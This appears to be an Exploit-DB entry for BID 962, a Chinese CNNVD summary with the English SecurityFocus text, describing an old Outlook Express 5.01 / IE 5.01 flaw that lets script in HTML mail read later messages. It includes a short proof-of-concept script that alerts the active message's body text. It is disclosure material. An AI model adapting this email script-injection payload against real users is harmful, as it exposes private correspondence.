https://www.exploit-db.com/exploits/19738
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-003

OutlookExpress5.01版本和InternetExplorer5.01版本存在漏洞。远程攻击者借助访问变量的脚本查看用户的电子邮件信息，此变量引用客户端已读取的后续的电子邮件消息。

source: http://www.securityfocus.com/bid/962/info

Microsoft Outlook Express 5, and possibly other email clients that parse HTML messages, can be made to run Active Scripting that will read any new messages that arrive after the hostile code has been run. 

Example code:
<SCRIPT>
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>");
a.x=window.document;
</SCRIPT>

来源:BID
名称:962
链接:http://www.securityfocus.com/bid/962